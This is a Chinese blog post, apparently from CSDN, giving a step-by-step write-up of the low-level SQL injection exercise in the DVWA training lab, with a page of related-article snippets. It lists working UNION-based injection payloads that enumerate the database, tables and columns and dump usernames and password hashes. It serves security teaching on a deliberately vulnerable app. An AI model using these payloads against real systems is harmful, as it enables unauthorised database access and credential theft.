[网络安全]DVWA之SQL注入—low level解题详析

已于 2024-05-30 20:30:38 修改
阅读量1w 收藏 2
点赞数 2
分类专栏: 网络安全 # DVWA靶场攻防实战 文章标签: web安全 sql dvwa
于 2023-04-19 19:56:09 首次发布
该原创文章未经本人许可,不得用于商业用途。未经授权不得转载,否则保留追究法律责任的权利。
本文链接:https://blog.csdn.net/2301_77485708/article/details/130251215
版权

文章目录

免责声明:本文仅分享SQL攻击相关知识,不承担任何法律责任。

判断漏洞类型

判断漏洞类型原理可参考[网络安全]SQL注入原理及常见攻击方法简析

  • 判断是否为数字型注入

在这里插入图片描述在这里插入图片描述
若为数字型注入,则第二个语句应回显Error或没有回显。

  • 判断是否为字符型注入
    在这里插入图片描述在这里插入图片描述

第二个语句没有回显,所以该漏洞类型为字符型注入漏洞。

判断注入点个数

输入1' order by 4#时,回显Unknown column '4' in 'order clause'
说明猜测的注入点个数过大
输入1' order by 2#时,回显如下:
在这里插入图片描述说明注入点个数为2或3
输入1' order by 3#时,回显Unknown column '3' in 'order clause'
所以注入点个数为两个

爆库名

输入1' union select 1,database()#
回显一个数据库名

在这里插入图片描述图片中第一段为第一个注入点的信息,第二段为第二个注入点(即database)的信息。

爆当前用户名

输入1' union select 1,user()#
在这里插入图片描述
由于注入点有两个,所以我们可以通过一个sql语句既查询数据库名又查询当前用户名
输入1' union select user(),database()#

在这里插入图片描述
注意,如果使用1' union select user()#的话,会回显The used SELECT statements have a different number of columns(所使用的 SELECT 语句具有不同数量的列),因为该语句的注入点只有一个。

爆表名

输入1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#
回显guestbook和users两个表名

在这里插入图片描述
也可采用如下语句
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#

在这里插入图片描述
其中,group_concat的作用是将多个值连接成一个字符串,并用逗号连接。

爆列名

输入1' union select 1, column_name from information_schema.columns where table_name='users'#

在这里插入图片描述
1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

在这里插入图片描述
相比之下,在查询结果过多的情况下,建议使用group_concat将查询结果集合起来

爆字段

输入1' union select user,password from users#

在这里插入图片描述

报错分析及解决方法

若SQL联合注入过程中出现该报错:illegal mix of collations for operation UNION
原因如下:information_schema里的table的排序规则是utf8_general_ci,而user表中字段默认为utf8_unicode_ci,导致字符排序不匹配。
解决方法:

1.在phpstudy中打开phpMyAdmin

在这里插入图片描述

2.进入dvwa数据库中的user表,将各列排序规则修改为utf8_gengeral_ci,保存即可。
在这里插入图片描述

秋说
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
网络安全-靶机dvwasql注入Low到High详解(含代码分析)_dvwa sql注入低中高代码分析(2)
2401_84253132的博客
04-29 627
print(‘数据库长度:’, length)# 一行行的爆数据,就不保存了,直接输出。# 第t+1个表的长度。# 第t+1个表的表名。# 第t+1个表的长度。# 第c+1个列的列名。
[网络安全]DVWASQL注入—High level解题简析
热门推荐
等风来
04-24 1万+
查看是否存在注入点python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" 判断注入类型判断注入点个数爆库名爆表名爆列名爆字段sqlmap注查看是否存在注入点爆库名爆表名爆列名爆字段[网络安全]DVWASQL注入low level解题详析 [网络安全]DVWASQL注入—medium level解题详析[网络安全]以留言板项目渗透实例带你入门sqlmap
网络安全-靶机dvwasql注入Low到High详解(含代码分析)_dvwa sql注入低中高代码分析
2401_84253132的博客
04-29 844
这样的话估计不能使用Error注入。结论:字段为2。
DVWA教程(一) —— Low
weixin_47610939的博客
04-29 1940
本篇文章为各位正在学习DVWA提供解题思路,同时也是本人的学习笔记,本文中的方法仅为验证漏洞,并无攻击目的。DVWA安装,可以使用docker容器,非常简单方便,通过以下链接: Docker Hubhttps://hub.docker.com/r/sagikazarmark/dvwa 0x01. 暴力破解 0x02. 代码注入 先看题目,是一个ping命令 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get in...
网络安全-靶机dvwasql注入Low到High详解(含代码分析)_dvwa sql注入低中高代码分析(1)
2401_84253132的博客
04-29 882
这样的话估计不能使用Error注入。结论:字段为2。
DVWASQL注入漏洞
weixin_56306210的博客
01-30 2401
DVWASQL注入漏洞
DVWAsql注入漏洞-low
m0_63735735的博客
07-19 1664
DVWAsql注入漏洞-low
DVWA】21. SQL Injection (Blind)SQL注入盲注(Low手工版)
Zichel77的博客
04-08 965
ascii():这是将字符转换为ASCII码的函数。因此,ascii(substr(database(),1,1))返回数据库名称的第二个字符的ASCII码。ascii(substr(database(),1,1)):这部分是一个SQL查询。substr():这是截取字符串的函数。database():这是一个MySQL内置函数,用于获取当前数据库的名称。=100:这是一个比较操作,检查第二个字符的ASCII码是否等于100。1 和 1 是用于指定截取字符串的起始位置和长度的参数。然后进行数据库名猜解。
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入low别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
DVWA下的SQL注入
07-25
SQL
网络安全原理与应用:SQL手工注入.pptx
05-16
SQL手工注入一、SQL手工注入知识点任务通过SQL手工注入的方法获取admin的密码1、检查是否存在注入点2、猜解SQL查询语句的字段数3、获取数据库名称4、获取数据表名5、获取字段名6、获取字段数据SQL手工注入二、SQL...
2020-12-06-DVWAsql.md
01-24
dvwasql
软件安全实验2 SQL注入实验
最新发布
06-19
DVWA目前的版本共有十个漏洞模块,分别是Brute Force(暴力破解)、Command Injection(命令行注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAPTCHA (不安全的...
SQL Injection——low
用博客做做记录的小白
06-06 127
DVWA靶场sql注入关卡低难度
DVWASQL注入(低
heyingcheng的博客
11-17 2450
注意:我们在输入框输入id=1' order by 1#,通过改造sql语句修改了应用程序逻辑,执行的sql语句实际上数据库中执行的是:select * from 表 where id='1' order by 1 #'。由于#已经注释掉了后面所有的内容,所以实际上的效果:select * from 表 where id='1' order by 1(#也可以换成--)继续输入1’and'1'='1或者1'='1发现可以正常回显,所以目前可以十分准确的判断存在的是sql注入中的字符型注入。
DVWASQL注入
RexHa的博客
09-27 1844
DVWA靶场sql注入三个别通关
Dvwa练习06 SQL注入Low
coco3105的博客
02-19 1140
low分别用了手工和sqlmap注入,medium没实践,high采用的是旧版本,没过滤参数。
DVWASQL注入的步骤
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
11-23 6626
SQL注入详解步骤及dvwa靶场演示,本站所有文章均为原创,欢迎转载,请注明文章出处:https://blog.csdn.net/weixin_43847838/article/details/109833310。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。
记一次DVWA下的SQL注入测试
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
01-10 301
文章目录一、前言二、Low别的测三、Medium别的测试 一、前言 本次测试环境:DVWA漏洞练习平台、kali、Firefox浏览器。 常用函数解析: 数据库系统函数 所具有的作用 一般使用方法 version() 通过该函数可以直接的查看数据库系统的版本号 select version() database() 该函数可以只管的查看当前操作的数据库名 select database() user() 查看当前数据库的用户权限以及用户名 select user() @@da
dvwasql注入(低
12-21
DVWA(Damn Vulnerable Web Application)是一个用于学习和测试Web应用程序安全的漏洞测试平台。其中包含了不同别的漏洞,包括SQL注入SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过在输入字段中插入恶意的SQL代码来执行未经授权的数据库操作。 在DVWA中进行SQL注入(低)的操作如下: 1. 打开DVWA平台并登录。 2. 在左侧导航栏中选择"SQL Injection"。 3. 在"SQL Injection"页面中,选择"Low"别。 4. 在页面上方的输入框中输入一个单引号(')并点击"Submit"按钮。 5. 页面将显示一个错误消息,表明存在SQL注入漏洞。 6. 在输入框中输入以下内容并点击"Submit"按钮: ``` 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()# ``` 这个语句将获取当前数据库中所有表的名称。 7. 页面将显示一个包含表名的结果集。 通过以上步骤,你可以在DVWA平台上进行SQL注入(低)的操作,并获取数据库中的表名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏,祝你平安喜乐。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值